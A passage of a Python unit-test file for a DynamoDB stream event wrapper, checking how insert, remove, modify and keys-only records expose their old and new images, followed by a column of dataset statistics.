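#     # plain == {"Username": "John Doe", "SizeBytes": Decimal("112")}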

def test_get_source_arn():
    dynamo_image = dynamo_event.DynamoEvent(create_insert_event('foo'))
    assert dynamo_image.event_source_arn == event_source_arn


def test_insert_event():
    dynamo_image = dynamo_event.DynamoEvent(create_insert_event('foo'))
    expected_image_with_deserialized_values = {
        'Message': 'foo',
        'Timestamp': '2016-11-18:12:09:36',
        'Username': 'John Doe'
    }
    expected_image = {
        "Timestamp": {
            "S": "2016-11-18:12:09:36"
        },
        "Message": {
            "S": 'foo'
        },
        "Username": {
            "S": "John Doe"
        }
    }
    assert dynamo_image.new_image(
        deserialize_values=True
    ) == expected_image_with_deserialized_values
    assert dynamo_image.new_image() == expected_image


def test_remove_event():
    dynamo_image = dynamo_event.DynamoEvent(create_remove_event('foo'))
    expected_image_with_deserialized_values = {
        'Message': 'foo',
        'Timestamp': '2016-11-18:12:09:36',
        'Username': 'John Doe'
    }
    expected_image = {
        "Timestamp": {
            "S": "2016-11-18:12:09:36"
        },
        "Message": {
            "S": 'foo'
        },
        "Username": {
            "S": "John Doe"
        }
    }
    assert dynamo_image.new_image(deserialize_values=True) is None
    assert dynamo_image.new_image() is None
    assert dynamo_image.old_image(
        deserialize_values=True
    ) == expected_image_with_deserialized_values
    assert dynamo_image.old_image() == expected_image


def test_modify_event():
    dynamo_image = dynamo_event.DynamoEvent(create_modify_event('foo', 'bar'))
    expected_old_image_with_deserialized_values = {
        'Message': 'foo',
        'Timestamp': '2016-11-18:12:09:36',
        'Username': 'John Doe'
    }
    expected_old_image = {
        "Timestamp": {
            "S": "2016-11-18:12:09:36"
        },
        "Message": {
            "S": 'foo'
        },
        "Username": {
            "S": "John Doe"
        }
    }
    expected_new_image_with_deserialized_values = {
        'Message': 'bar',
        'Timestamp': '2016-11-18:12:09:36',
        'Username': 'John Doe'
    }
    expected_new_image = {
        "Timestamp": {
            "S": "2016-11-18:12:09:36"
        },
        "Message": {
            "S": 'bar'
        },
        "Username": {
            "S": "John Doe"
        }
    }
    assert dynamo_image.new_image(
        deserialize_values=True
    ) == expected_new_image_with_deserialized_values
    assert dynamo_image.new_image() == expected_new_image
    assert dynamo_image.old_image(
        deserialize_values=True
    ) == expected_old_image_with_deserialized_values
    assert dynamo_image.old_image() == expected_old_image


def test_modify_event_keys_only():
    dynamo_image = dynamo_event.DynamoEvent(create_modify_event_keys_only())
    assert dynamo_image.new_image(deserialize_values=True) is None
    assert dynamo_image.new_image() is None
    assert dynamo_image.old_image(deserialize_values=True) is None
    assert dynamo_image.old_image() is None
    assert dynamo_image.keys(deserialize_values=True) == {
        'Timestamp': '2016-11-18:12:09:36',
        'Username': 'John Doe'
    }
    assert dynamo_image.keys() == {
        "Timestamp": {
            "S": "2016-11-18:12:09:36"
        },
        "Username": {
            "S": "John Doe"
        }
    }
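
# Usage sketch: each DynamoEvent above wraps a single entry of the shape
# found in a stream event's "Records" list, so a Lambda handler built on
# this class would iterate those records. The handler below is hypothetical,
# shown only to illustrate the API exercised by these tests:
#
#     def handler(event, context):
#         for record in event["Records"]:
#             d_event = dynamo_event.DynamoEvent(record)
#             if record["eventName"] == "REMOVE":
#                 print("removed:", d_event.old_image(deserialize_values=True))
#             else:
#                 print("written:", d_event.new_image(deserialize_values=True))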
| 25.445902
| 78
| 0.525061
| 724
| 7,761
| 5.375691
| 0.11326
| 0.062179
| 0.036999
| 0.046249
| 0.903905
| 0.849178
| 0.795221
| 0.767986
| 0.727903
| 0.637718
| 0
| 0.102729
| 0.339003
| 7,761
| 304
| 79
| 25.529605
| 0.655945
| 0.002964
| 0
| 0.573643
| 0
| 0
| 0.2606
| 0.055067
| 0
| 0
| 0
| 0
| 0.065891
| 1
| 0.050388
| false
| 0
| 0.003876
| 0.031008
| 0.085271
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
|